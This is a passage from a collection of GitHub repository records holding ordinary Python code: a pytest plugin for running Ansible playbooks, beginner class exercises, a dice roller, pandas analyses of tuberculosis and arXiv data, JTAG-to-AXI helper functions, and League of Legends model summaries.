({}) \"\n \"is not accessible\").format(inventory_path)\n raise pytest.UsageError(msg)\n\n\ndef get_ansible_cmd(inventory_file, playbook_file):\n \"\"\"\n Return process args list for ansible-playbook run.\n \"\"\"\n ansible_command = [\n \"ansible-playbook\",\n \"-vv\",\n \"-i\", inventory_file,\n playbook_file,\n ]\n return ansible_command\n\n\ndef get_empty_marker_error(marker_type):\n \"\"\"\n Generate error message for empty marker.\n \"\"\"\n msg = (\n \"no playbook is specified in \"\n \"``@pytest.mark.ansible_playbook_{0}`` decorator \"\n \"of this test case, please add at least one playbook \"\n \"file name as a parameter into the marker, eg. 
\"\n \"``@pytest.mark.ansible_playbook_{0}('playbook.yml')``\")\n return msg.format(marker_type)\n\n\[email protected]\ndef runner(\n request,\n setup_playbooks=None,\n teardown_playbooks=None,\n skip_teardown=False):\n \"\"\"\n Context manager which will run playbooks specified in it's arguments.\n\n :param request: pytest request object\n :param setup_playbooks: list of setup playbook names (optional)\n :param teardown_playbooks: list of setup playbook names (optional)\n :param skip_teardown:\n if True, teardown playbooks are not executed when test case fails\n\n It's expected to be used to build custom fixtures or to be used\n directly in a test case code.\n \"\"\"\n setup_playbooks = setup_playbooks or []\n teardown_playbooks = teardown_playbooks or []\n run_teardown = True\n # process request object\n directory = request.config.option.ansible_playbook_directory\n inventory = request.config.option.ansible_playbook_inventory\n # setup\n for playbook_file in setup_playbooks:\n subprocess.check_call(\n get_ansible_cmd(inventory, playbook_file),\n cwd=directory)\n try:\n yield\n except Exception as ex:\n if skip_teardown:\n run_teardown = False\n raise ex\n finally:\n if run_teardown:\n # teardown\n for playbook_file in teardown_playbooks:\n subprocess.check_call(\n get_ansible_cmd(inventory, playbook_file),\n cwd=directory)\n\n\[email protected]\ndef ansible_playbook(request):\n \"\"\"\n Pytest fixture which runs given ansible playbook. When ansible returns\n nonzero return code, the test case which uses this fixture is not\n executed and ends in ``ERROR`` state.\n \"\"\"\n setup_playbooks = []\n teardown_playbooks = []\n\n if hasattr(request.node, \"get_marker\"):\n marker = request.node.get_marker('ansible_playbook_setup')\n setup_ms = [marker] if marker is not None else []\n marker = request.node.get_marker('ansible_playbook_teardown')\n teardown_ms = [marker] if marker is not None else []\n else:\n # since pytest 4.0.0, markers api changed, see:\n # https://github.com/pytest-dev/pytest/pull/4564\n # https://docs.pytest.org/en/latest/mark.html#updating-code\n setup_ms = request.node.iter_markers('ansible_playbook_setup')\n teardown_ms = request.node.iter_markers('ansible_playbook_teardown')\n\n for marker in setup_ms:\n if len(marker.args) == 0:\n raise Exception(get_empty_marker_error(\"setup\"))\n setup_playbooks.extend(marker.args)\n for marker in teardown_ms:\n if len(marker.args) == 0:\n raise Exception(get_empty_marker_error(\"teardown\"))\n teardown_playbooks.extend(marker.args)\n\n if len(setup_playbooks) == 0 and len(teardown_playbooks) == 0:\n msg = (\n \"no ansible playbook is specified for the test case, \"\n \"please add a decorator like this one \"\n \"``@pytest.mark.ansible_playbook_setup('playbook.yml')`` \"\n \"or \"\n \"``@pytest.mark.ansible_playbook_teardown('playbook.yml')`` \"\n \"for ansible_playbook fixture to know which playbook to use\")\n raise Exception(msg)\n\n with runner(request, setup_playbooks, teardown_playbooks):\n yield\n"
}
] | 1 |
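The plugin above wires its setup/teardown playbooks to tests through markers and the `ansible_playbook` fixture. A minimal sketch of how a test would consume it; the playbook file names and paths are hypothetical, while the marker names, fixture name, and CLI options come from the plugin source:

```python
# test_example.py -- illustrative only; setup.yml and teardown.yml are hypothetical.
# Run with the options the plugin registers, e.g.:
#   pytest --ansible-playbook-directory=playbooks --ansible-playbook-inventory=hosts
import pytest


@pytest.mark.ansible_playbook_setup('setup.yml')
@pytest.mark.ansible_playbook_teardown('teardown.yml')
def test_with_playbooks(ansible_playbook):
    # setup.yml has already run by this point; teardown.yml runs after the test,
    # and a nonzero ansible-playbook exit code puts the test in ERROR state.
    assert True
```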
enzosuname/pythonProject
|
https://github.com/enzosuname/pythonProject
|
2845810879e4758dc49bb6bbb4dbf8d0d4076853
|
85033a389bf488e4dc88621c315f4d0a80d2cafe
|
ac8f342612dc1f98ce720c11df906c435f6c0059
|
refs/heads/master
| 2023-08-18T18:58:23.862023 | 2021-09-17T13:29:49 | 2021-09-17T13:29:49 | 405,971,088 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5457875728607178,
"alphanum_fraction": 0.6025640964508057,
"avg_line_length": 20.84000015258789,
"blob_id": "bc9e757351726a2568894bf8bce37ce95baa7727",
"content_id": "9f49d2ed0cadcec542bd04ad29d61e51a0371bc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 25,
"path": "/main.py",
"repo_name": "enzosuname/pythonProject",
"src_encoding": "UTF-8",
"text": "class Rocket():\n def __init__(self, x_loc, y_loc, height=200):\n self.height = height\n self.velocity = 10\n self.x_loc = x_loc\n self.y_loc = y_loc\n\n def move_up(self):\n self.y_loc += self.velocity\n\nRocket1 = Rocket(2,3)\nRocket2 = Rocket(200, 300)\n\nfor i in range(10):\n Rocket2.move_up()\n print(Rocket2.y_loc)\n print()\n\nenemy_rockets = [Rocket(80, 90) for i in range(10)]\nfor i in range(10):\n rocket=Rocket(50, 60)\n enemy_rockets.append(rocket)\n\nfor rocket in enemy_rockets:\n print(rocket)\n"
},
{
"alpha_fraction": 0.5373226404190063,
"alphanum_fraction": 0.5749537348747253,
"avg_line_length": 23.953845977783203,
"blob_id": "802df2c955c5eaa73a1ddfd665faa4697ac9efd9",
"content_id": "e57e6871cae2d642577113e02b8291b31d739d64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1621,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 65,
"path": "/oob.py",
"repo_name": "enzosuname/pythonProject",
"src_encoding": "UTF-8",
"text": "import random as r\n\nclass Rocket():\n def __init__(self, x_loc=0, y_loc=0, height=200):\n self.height = height\n self.x_loc = x_loc\n self.y_loc = y_loc\n\n\n def move_rocket(self,y_vel,x_vel):\n self.y_loc += y_vel\n self.x_loc += x_vel\n\nRocket1 = Rocket(200, 300)\n\nfor i in range(5):\n Rocket1.move_rocket(int(input(f\"At what rate is the rocket moving vertically? : \")), \\\n int(input(f\"At what rate is the rocket moving horizontally? : \")))\n print(Rocket1.y_loc)\n print(Rocket1.x_loc)\n print()\n\ndef rocket_fleet():\n set = 0\n whichone = 0\n list =[]\n while set < 4:\n rdmrocket = Rocket(r.randrange(50, 450),(r.randrange(50, 450)))\n list.append(rdmrocket)\n set +=1\n for gabagool in list:\n print(f\"Rocket {whichone+1} is at x={gabagool.x_loc}, y={gabagool.y_loc}.\")\n whichone += 1\n gabagool.x_loc += r.randrange(10, 150)\n gabagool.y_loc += r.randrange(10, 150)\n whichone=0\n for gabagool in list:\n print(f\"Rocket {whichone+1} is NOW at x={gabagool.x_loc}, y={gabagool.y_loc}.\")\n whichone += 1\n\ndef get_distance():\n p\nrocket_fleet()\n\n\n\n\n\nclass Rocket():\n def __init__(self, x_loc=0, y_loc=0, color=\"red\", mass=200 ):\n self.color = color\n self.x_loc = x_loc\n self.y_loc = y_loc\n self.mass = mass\n\n\n def move_rocket(self,y_vel,x_vel):\n self.y_loc += y_vel\n self.x_loc += x_vel\n\nrocketnew1 = Rocket()\nrocketnew2 = Rocket(100, 2, \"blue\", 800)\nnews=[rocketnew1,rocketnew2]\nfor rocket in news:\n print(rocket.color, rocket.mass)"
}
] | 2 |
draconian56/PythonDnDRoller
|
https://github.com/draconian56/PythonDnDRoller
|
8eb0817e97a182331bd9e9d32d67dfe6ec588156
|
bb0a0d017a3459f967c3f83a263aa038f01e417a
|
85b694c8c9a9e224a1929cb869058369ad2c92a5
|
refs/heads/master
| 2021-01-20T09:38:27.618702 | 2017-05-06T11:21:30 | 2017-05-06T11:21:30 | 90,276,477 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.44897958636283875,
"alphanum_fraction": 0.4516415297985077,
"avg_line_length": 26.897436141967773,
"blob_id": "1b39be0f7d6cc41a489ee9b9a386c6bfc42d23c3",
"content_id": "cab5f650d9bedd4b1aefdc33390c33c02d8cfbe3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1127,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 39,
"path": "/DnDDiceRoller.py",
"repo_name": "draconian56/PythonDnDRoller",
"src_encoding": "UTF-8",
"text": "######################\r\n# This is a basic #\r\n# dice roller for my #\r\n# games of DnD #\r\n######################\r\n\r\nfrom random import *\r\n\r\nprint \"Welcome to the dice roller\"\r\n\r\nwhile True:\r\n choice = raw_input(\"Do you want to make a roll? \")\r\n if choice == \"\":\r\n diceRolled = 0\r\n total = 0\r\n while True:\r\n try:\r\n diceAmount = int(raw_input(\"Please enter how many times you would like to roll: \")) \r\n except ValueError:\r\n print \"Not an int, try again: \"\r\n continue\r\n else:\r\n break\r\n while True:\r\n try:\r\n diceSides = int(raw_input(\"Please input how many sides the dice has: \"))\r\n except ValueError:\r\n print \"Not an int, try again: \"\r\n continue\r\n else:\r\n break\r\n for i in range(diceAmount):\r\n diceRolled = randint(1, diceSides)\r\n total = total + diceRolled\r\n print diceRolled \r\n print total\r\n elif choice == \"no\":\r\n break\r\nexit()\r\n"
}
] | 1 |
gmazurek/Code-using-Pandas-for-database-design
|
https://github.com/gmazurek/Code-using-Pandas-for-database-design
|
7f9e7de7da6b2875739cb334af2212bc4759befb
|
ce2693e9bde4276df52cf3ca0f68b112ecde0ced
|
066f902ff8a66d804bba0afc114ae1f2b6c7f30d
|
refs/heads/master
| 2020-05-02T14:52:11.972262 | 2019-03-27T15:36:45 | 2019-03-27T15:36:45 | 178,024,294 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6311320662498474,
"alphanum_fraction": 0.6726415157318115,
"avg_line_length": 41.838382720947266,
"blob_id": "d00ed371c49197b9002f07be601c68912c687c4d",
"content_id": "864666186f47fb2a6bca40b1f73f19a081cd5826",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4240,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 99,
"path": "/assignment_3.py",
"repo_name": "gmazurek/Code-using-Pandas-for-database-design",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Tue Feb 19 11:56:25 2019\n\n@author: gabriellamazurek\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\n\ndef pandas1():\n #read in the csv and account for the missing data with asterisks. Note: in assignment #2 I did not have asterisks in place of missing data, and now I do.\n df=pd.read_csv(' data_out_copy.csv',sep=',',encoding='utf-8',\n na_values='*')\n \n #get number of rows and columns\n num_rows = df.shape[0]\n num_cols = df.shape[1]\n\n print(\"Number of rows: \"+str(num_rows))\n print(\"Number of columns: \"+str(num_cols)) \n\n \n\n \n print(\"\\nSorting the success rate of treatment on new TB patients in 2016 in descending order:\")\n \n #sort the new TB cases of 2016 in descending order\n selection1 = df.loc[(df[\"Year\"]==2016)].sort_values(\"Treatment success rate: new TB cases\", ascending = False) \n print(selection1[[\"Country\", \"Treatment success rate: new TB cases\"]])\n \n\n #get the average success rate for new TB cases in 2016\n print(\"The mean success rate in 2016:\")\n print(selection1[[\"Treatment success rate: new TB cases\"]].dropna().mean())\n \n #get the median success rate for new TB cases in 2016\n print(\"The median success rate in 2016:\")\n print(selection1[[\"Treatment success rate: new TB cases\"]].dropna().median())\n \n print(\"\\nSorting the success rate of treatment on new TB patients in 1995 in descending order:\")\n \n selection2 = df.loc[(df[\"Year\"]==1995)].sort_values(\"Treatment success rate: new TB cases\", ascending = False) \n print(selection2[[\"Country\", \"Treatment success rate: new TB cases\"]])\n \n \n #get the average success rate for new TB cases in 1995\n print(\"The mean success rate in 1995:\")\n print(selection2[[\"Treatment success rate: new TB cases\"]].dropna().mean())\n \n #get the median success rate for new TB cases in 1995\n print(\"The median success rate in 1995:\")\n print(selection2[[\"Treatment success rate: new TB cases\"]].dropna().median())\n \n #bottom 10 0f 2016 in new TB\n print(\"\\nThe ten countries with the lowest success rate in treatment of new TB cases in 2016:\")\n \n selection3 = df.loc[(df[\"Year\"]==2016)].sort_values(\"Treatment success rate: new TB cases\", ascending = False)\n print(selection3[[\"Country\", \"Treatment success rate: new TB cases\"]].dropna().tail(10))\n #get the average success rate for bottom 10 new TB cases in 2016\n print(\"The mean success rate:\")\n print(selection3[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).mean())\n \n #get the median success rate for bottom 10 new TB cases in 2016\n print(\"The median success rate:\")\n print(selection3[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).median())\n \n\n #bottom 10 0f 1995 in new TB\n print(\"\\nThe ten countries with the lowest success rate in treatment of new TB cases in 2016:\")\n \n selection4 = df.loc[(df[\"Year\"]==1995)].sort_values(\"Treatment success rate: new TB cases\", ascending = False)\n print(selection4[[\"Country\", \"Treatment success rate: new TB cases\"]].dropna().tail(10))\n #get the average success rate for bottom 10 new TB cases in 1995\n print(\"The mean success rate:\")\n print(selection4[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).mean())\n \n #get the median success rate for bottom 10 new TB cases in 1995\n print(\"The median success rate:\")\n print(selection4[[\"Treatment success rate: new TB cases\"]].dropna().tail(10).median())\n \n #argentina is the only country 
in 1995 and 2016 bottom 10- check out its' data, see if it's progressed\n print(\"\\nArgentina's success rate 1995-2016:\")\n \n selection5 = df.loc[(df[\"Country\"]==\"Argentina\")].sort_values(\"Year\", ascending = False)\n print(selection5[[\"Year\", \"Treatment success rate: new TB cases\"]].dropna())\n #get the average success rate for argentina\n print(\"The mean success rate:\")\n print(selection5[[\"Treatment success rate: new TB cases\"]].dropna().mean())\n \n #get the median success rate for argentina\n print(\"The median success rate:\")\n print(selection5[[\"Treatment success rate: new TB cases\"]].dropna().median())\n \n \npandas1()"
}
] | 1 |
yoyo0055/YOYO
|
https://github.com/yoyo0055/YOYO
|
696b690c340f66ad163e8180d25b9da362fe4842
|
deff6ac28593161c545588ef4648a985728e4709
|
225261dffa68fcde2f5de55e9a6e4d4f53a57ecd
|
refs/heads/main
| 2023-02-14T17:48:19.889068 | 2021-01-12T16:27:46 | 2021-01-12T16:27:46 | 329,043,863 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5805449485778809,
"alphanum_fraction": 0.6080306172370911,
"avg_line_length": 27.871429443359375,
"blob_id": "97fffb6f9885d553ac613f9942ba634ffcb146c0",
"content_id": "7a0e09122139da11152c079a3071c0ef81b29a4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5002,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 140,
"path": "/添加编号.py",
"repo_name": "yoyo0055/YOYO",
"src_encoding": "UTF-8",
"text": "#-*— codeing = utf-8 -*—\r\n#@Time : 2021/01/11 13:40\r\n#@Author : gyr\r\n#@File : 添加编号.py\r\n#@software : PyCharm\r\n\r\nimport seaborn as sns #用于画图\r\nfrom bs4 import BeautifulSoup #用于爬取arxiv的数据\r\nimport re #用于正则表达式,匹配字符串的模式\r\nimport requests #用于网络连接,发送网络请求,使用域名获取对应信息\r\nimport json #读取数据,我们的数据为json格式的\r\nimport pandas as pd #数据处理,数据分析\r\nimport matplotlib.pyplot as plt #画图工具pu\r\n\r\n# 读入数据\r\ndata = [] # 初始化\r\n# 使用with语句优势:1.自动关闭文件句柄;2.自动显示(处理)文件读取数据异常\r\nwith open(\"arxiv-metadata-oai-snapshot.json\", 'r') as f:\r\n for index, line in enumerate (f):\r\n data.append(json.loads(line))\r\n # if index < 100000:\r\n # data.append(json.loads(line))\r\n # else :\r\n # break\r\n\r\n\r\ndata = pd.DataFrame(data) # 将list变为dataframe格式,方便使用pandas进行分析\r\nprint(data.shape)\r\n#data.shape # 显示数据大小\r\n\r\n# '''\r\n# count:一列数据的元素个数;\r\n# unique:一列数据中元素的种类;\r\n# top:一列数据中出现频率最高的元素;\r\n# freq:一列数据中出现频率最高的元素的个数;\r\n# '''\r\n\r\nprint(data[\"categories\"].describe())\r\n\r\nunique_categories = set([i for l in [x.split(' ') for x in data[\"categories\"]] for i in l])\r\nlen(unique_categories)\r\nunique_categories\r\n\r\ndata[\"year\"] = pd.to_datetime(data[\"update_date\"]).dt.year #将update_date从例如2019-02-20的str变为datetime格式,并提取处year\r\ndel data[\"update_date\"] #删除 update_date特征,其使命已完成\r\ndata = data[data[\"year\"] >= 2019] #找出 year 中2019年以后的数据,并将其他数据删除\r\n# data.groupby(['categories','year']) #以 categories 进行排序,如果同一个categories 相同则使用 year 特征进行排序\r\ndata.reset_index(drop=True, inplace=True) #重新编号\r\ndata #查看结果\r\n\r\n# 爬取所有的类别\r\nwebsite_url = requests.get('https://arxiv.org/category_taxonomy').text # 获取网页的文本数据\r\nsoup = BeautifulSoup(website_url, 'lxml') # 爬取数据,这里使用lxml的解析器,加速\r\nroot = soup.find('div', {'id': 'category_taxonomy_list'}) # 找出 BeautifulSoup 对应的标签入口\r\ntags = root.find_all([\"h2\", \"h3\", \"h4\", \"p\"], recursive = True) # 读取 tags\r\n\r\n# 初始化 str 和 list 变量\r\nlevel_1_name = \"\"\r\nlevel_2_name = \"\"\r\nlevel_2_code = \"\"\r\nlevel_1_names = []\r\nlevel_2_codes = []\r\nlevel_2_names = []\r\nlevel_3_codes = []\r\nlevel_3_names = []\r\nlevel_3_notes = []\r\n\r\n# 进行\r\nfor t in tags:\r\n if t.name == \"h2\":\r\n level_1_name = t.text\r\n level_2_code = t.text\r\n level_2_name = t.text\r\n elif t.name == \"h3\":\r\n raw = t.text\r\n level_2_code = re.sub(r\"(.*)\\((.*)\\)\", r\"\\2\", raw) # 正则表达式:模式字符串:(.*)\\((.*)\\);被替换字符串\"\\2\";被处理字符串:raw\r\n level_2_name = re.sub(r\"(.*)\\((.*)\\)\", r\"\\1\", raw)\r\n elif t.name == \"h4\":\r\n raw = t.text\r\n level_3_code = re.sub(r\"(.*) \\((.*)\\)\", r\"\\1\", raw)\r\n level_3_name = re.sub(r\"(.*) \\((.*)\\)\", r\"\\2\", raw)\r\n elif t.name == \"p\":\r\n notes = t.text\r\n level_1_names.append(level_1_name)\r\n level_2_names.append(level_2_name)\r\n level_2_codes.append(level_2_code)\r\n level_3_names.append(level_3_name)\r\n level_3_codes.append(level_3_code)\r\n level_3_notes.append(notes)\r\n\r\n# 根据以上信息生成dataframe格式的数据\r\ndf_taxonomy = pd.DataFrame({\r\n 'group_name': level_1_names,\r\n 'archive_name': level_2_names,\r\n 'archive_id': level_2_codes,\r\n 'category_name': level_3_names,\r\n 'categories': level_3_codes,\r\n 'category_description': level_3_notes\r\n\r\n})\r\n\r\n# 按照 \"group_name\" 进行分组,在组内使用 \"archive_name\" 进行排序\r\ndf_taxonomy.groupby([\"group_name\", \"archive_name\"])\r\ndf_taxonomy\r\n\r\nimport re\r\n#\r\n# phone = \"2004-959-559 # 这是一个电话号码\"\r\n\r\n# 删除注释\r\n# num = re.sub(r'#.*$', \"\", phone)\r\n# print(\"电话号码 : \", num)\r\n#\r\n# # 移除非数字的内容\r\n# num = re.sub(r'\\D', \"\", phone)\r\n# print(\"电话号码 : \", 
num)\r\n\r\nre.sub(r\"(.*)\\((.*)\\)\",r\"\\2\",raw)\r\n\r\n#raw = Astrophysics(astro-ph)\r\n#output = astro-ph\r\n\r\n\r\n\r\n_df = data.merge(df_taxonomy, on=\"categories\", how=\"left\").drop_duplicates([\"id\",\"group_name\"]).groupby(\"group_name\").agg({\"id\":\"count\"}).sort_values(by=\"id\",ascending=False).reset_index()\r\n\r\nprint(_df)\r\n\r\n\r\n\r\nfig = plt.figure(figsize=(15,12))\r\nexplode = (0, 0, 0, 0.2, 0.3, 0.3, 0.2, 0.1)\r\nplt.pie(_df[\"id\"], labels=_df[\"group_name\"], autopct='%1.2f%%', startangle=160, explode=explode)\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n\r\ngroup_name=\"Computer Science\"\r\ncats = data.merge(df_taxonomy, on=\"categories\").query(\"group_name == @group_name\")\r\ncats.groupby([\"year\",\"category_name\"]).count().reset_index().pivot(index=\"category_name\", columns=\"year\",values=\"id\")\r\n\r\n"
}
] | 1 |
npp-ntt/jtaxi
|
https://github.com/npp-ntt/jtaxi
|
1183f8ff8d90c15f7c85071b634b9958fffdc6d0
|
73f3b588b0523d2e1fd593b928a9916cce71fbc9
|
b9a363160603418fd1204458e9b5287d7182ae9c
|
refs/heads/master
| 2020-06-23T14:48:19.949987 | 2019-08-02T06:30:53 | 2019-08-02T06:30:53 | 198,653,989 | 5 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4433459937572479,
"alphanum_fraction": 0.46920153498649597,
"avg_line_length": 27.377777099609375,
"blob_id": "5f92191c3a7d852255da442f91b004e703396665",
"content_id": "8924a63c818dee7cc37329d182e228788b60db4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2630,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 90,
"path": "/python_code/JTAG2AXI.py",
"repo_name": "npp-ntt/jtaxi",
"src_encoding": "UTF-8",
"text": "from jft import *\r\nfrom jftsettings import *\r\n\r\ndef TransToAXIS(group_name, width, flag_last, data):\r\n if((width>64)|(width<8)): \r\n print(\"TransToAXIS: --------------ERROR! Incorrect width--------------\")\r\n sys.exit() \r\n if ((flag_last<0)|(flag_last >1)) : \r\n print(\"TransToAXIS: --------------ERROR! Incorrect flag_last--------------\")\r\n sys.exit()\r\n DriveGroup(group_name, ((1 << width) | (flag_last << width + 1) | data))\r\n\r\r\n\r\r\ndef RecivFromAXIS(group_name, width):\r\n if((width>64)|(width<8)): \r\n print(\"RecivFromAXIS: --------------ERROR! Incorrect width--------------\")\r\n sys.exit() \r\r\n DriveGroup(group_name, ((1 << width) | ((1 << width + 2))))\r\n data = GetGroup(group_name) \r\n data=bin(data)\r\n data=data[5:]\r\n return bit2int(data)\r\r\n\r\r\ndef ResetAXIS(group_name,width):\r\n if((width>64)|(width<8)): \r\n print(\"ResetAXIS: --------------ERROR! Incorrect width--------------\")\r\n sys.exit() \r\r\n DriveGroup(group_name, 1<<width+1)\r\r\n\r\ndef TransToAXIL(group_name,data,addr,SWidth):\r\n if(addr%4 != 0):\r\n print(\"TransToAXIMM: --------------ERROR! Incorrect addr (addr%4 != 0)--------------\")\r\n sys.exit()\r\n if((SWidth>64)|((SWidth<8)&(SWidth!=0))): \r\n print(\"TransToAXIMM: --------------ERROR! Incorrect SWidth--------------\") \r\n if(SWidth==0):\r\n DriveGroup(group_name, ((data<<32)|addr)) \r\n else:\r\n DriveGroup(group_name, (((data<<32)|addr)<<SWidth)) \r\n \r\ndef RecivFromAXIL(group_name, addr,SWidth):\r\n if(addr%4 != 0):\r\n print(\"RecivFromAXIMM: --------------ERROR! Incorrect addr (addr%4 != 0)--------------\")\r\n sys.exit()\r\n if((SWidth>64)|(SWidth<8 & SWidth!=0)): \r\n print(\"RecivFromAXIMM: --------------ERROR! Incorrect SWidth--------------\") \r\n if(SWidth==0):\r\n DriveGroup(group_name, ((1<<64)|addr))\r\n data = GetGroup(group_name);\r\n else:\r\n DriveGroup(group_name, ((1<<64)|addr)<<SWidth)\r\n data = GetGroup(group_name);\r\n data=bin(data);\r\n return int(data[3:32+3],2) \r\n\r\r\ndef bit2int(input):\r\r\n if (input[0] == '0'):\r\r\n # output=input[1:]\r\r\n output = input[1:]\r\r\n output = int(output, 2);\r\r\n else:\r\r\n for i in range(1, len(input)):\r\r\n if (input[i] == '0'):\r\r\n input = input[:i] + '1' + input[i + 1:]\r\r\n else:\r\r\n input = input[:i] + '0' + input[i + 1:]\r\r\n output = input[1:]\r\r\n output = -(int(output, 2) + 1);\r\r\n return output "
},
{
"alpha_fraction": 0.7599999904632568,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 24,
"blob_id": "e3d6d765efbd3cd207cbae291110a5098760360d",
"content_id": "c9e7e3123888c516841e13bd37052d1c69818315",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 50,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 2,
"path": "/README.md",
"repo_name": "npp-ntt/jtaxi",
"src_encoding": "UTF-8",
"text": "# jtaxi\nJtag to AXI lite/AXI stream IP for Xilinx\n"
}
] | 2 |
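The `bit2int` helper in the `JTAG2AXI.py` entry above treats the first character of a binary string as a sign bit and manually complements the remaining bits. A standalone check of that behavior, assuming no JTAG hardware or `jft` backend is available; it compares against an ordinary two's-complement decode:

```python
def twos_complement(bits):
    # Reference decoder: read the whole string as an unsigned integer,
    # then subtract 2**n when the sign bit is set.
    value = int(bits, 2)
    if bits[0] == '1':
        value -= 1 << len(bits)
    return value

# bit2int('1011') flips the bits after the sign bit ('011' -> '100'),
# converts to 4, and returns -(4 + 1) = -5, matching the reference:
assert twos_complement('0101') == 5
assert twos_complement('1011') == -5
```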
GabeHinton/League-Project
|
https://github.com/GabeHinton/League-Project
|
c94ba9fe542ab38b0013cf36829db4f26e1c6b00
|
da15e0219565f1a7a3e2985d267c5a176a400dae
|
3ed565fdeec6cb79ae6b8fdbe5bc7b8eccf98cf8
|
refs/heads/master
| 2021-01-10T17:20:31.816145 | 2016-02-29T22:26:06 | 2016-02-29T22:26:06 | 51,344,341 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7868852615356445,
"alphanum_fraction": 0.7868852615356445,
"avg_line_length": 19.33333396911621,
"blob_id": "ae9ed2bb658cec81f243172d3f186f640fd008b5",
"content_id": "ec1936c0dea61547b5b30a5897c2875218859d1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 61,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 3,
"path": "/Images/Readme.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#Images\n\nA folder for uploading images used in the reports.B\n"
},
{
"alpha_fraction": 0.7480236887931824,
"alphanum_fraction": 0.7845849990844727,
"avg_line_length": 71.10713958740234,
"blob_id": "132577811766bcaed7744fad8b693b7543b8ada8",
"content_id": "05f7a5c82dad2ab49e325e9cb66a34a347a90aa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2024,
"license_type": "no_license",
"max_line_length": 191,
"num_lines": 28,
"path": "/Player-A-Model/Executive Summary - Player A.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#Executive Summary - Player A Model\n\nData was compiled for ranked games during which Player A played Support. Using the same fourteen variables as player T,\na model was built to attempt to predict whether Player A would win or lose his match. The final model had\nthree significant variables:\n\nGold1020: The average gold per minute Player A earned from minutes 10 to 20 \nDamageTaken1020: The average damage per minute Player A took from minutes 10 to 20 \nWardsPlaced: The number of wards of any type placed by Player A during the match. \n\nThe model correctly predicted 83% of games correctly, which is even higher than Player T's model. Curiously, two of Player A's \nthree significant variables were the only two variables that were significant in Player T's model. This discovery does help answer\none of the questions raised after the Player T analysis, perhaps the model in whole or part can be generalized to all roles.\nThe following questions still remain to follow up from this analysis: \n\n1) Can we generalize this model to Jungle? Will Gold1020 and DamageTaken1020 appear again? \n2) Can we generalize this model for all Support players? Will the same variables be significant? \n3) Can we support a claim that more gold and less damage taken are actually causing Player T to win? \nOne cannot conclude with confidence that taking less damage or earning more gold specifically lead to Players T and A having a higher \nchance of victory. It is possible that Players T and A are performing other actions that lead to his victory that also have a side effect \nof earning him gold or taking less damage.\n\nPerforming additional tests using a larger number of players to find evidence to address these questions will help validate\n and clarify the models.\n \nNumerically, the final model for Player A was as follows:\n\nPredicted Probability of Winning the Game = e^{-4.67 - .005*DamageTaken1020 + .0204*Gold1020 + .0661*WardsPlaced} / (1 + e^{-4.67 - .005*DamageTaken1020 + .0204*Gold1020 + .0661*WardsPlaced})\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7526621222496033,
"alphanum_fraction": 0.7850919365882874,
"avg_line_length": 107.7368392944336,
"blob_id": "cad1896f40ebb5530f650cfe75b509d55dc47598",
"content_id": "bb3865dae960688b1308296209fb088a8c09c00f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2066,
"license_type": "no_license",
"max_line_length": 434,
"num_lines": 19,
"path": "/Player-T-Model/Executive Summary - Player T.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "# Executive Summary - Player T Model\n\nData was compiled for ranked games during which Player T played Top, Mid, or ADC. Using fourteen variables, a model was built to attempt to predict whether Player T would win or lose his match. The final model had two significant variables:\n\nGold1020: The average gold per minute Player T earned from minutes 10 to 20 \nDamageTaken1020: The average damage per minute Player T took from minutes 10 to 20 \n\nThe model correctly predicted 2/3 of games, notably more than would be expected from lucky guesses. Far from perfect accuracy is to be expected when trying to predict the outcome of a team game based on one player. However, it does seem these results indicate that a more accurate model that accounts for more variables should be possible. Thus, this analysis has led to the following questions that merit more testing to answer: \n\n1) Can we generalize the model for all players? Will the same and only the same two variables be significant in models built for different players playing Top, Mid, and/or ADC? \n2) Can we generalize the model for all roles? Will the same and only the same two variables be significant in models built for players playing as Jungle or Support? \n3) Can we add other variables not yet considered to improve the accuracy of predictions of Player T's model? \n4) Can we support a claim that more gold and less damage taken are actually causing Player T to win? One cannot conclude with confidence that taking less damage or earning more gold specifically lead to Player T having a higher chance of victory. It is possible that Player T is performing other actions that lead to his victory that also have a side effect of earning him gold or taking less damage. \n\nPerforming additional tests to find 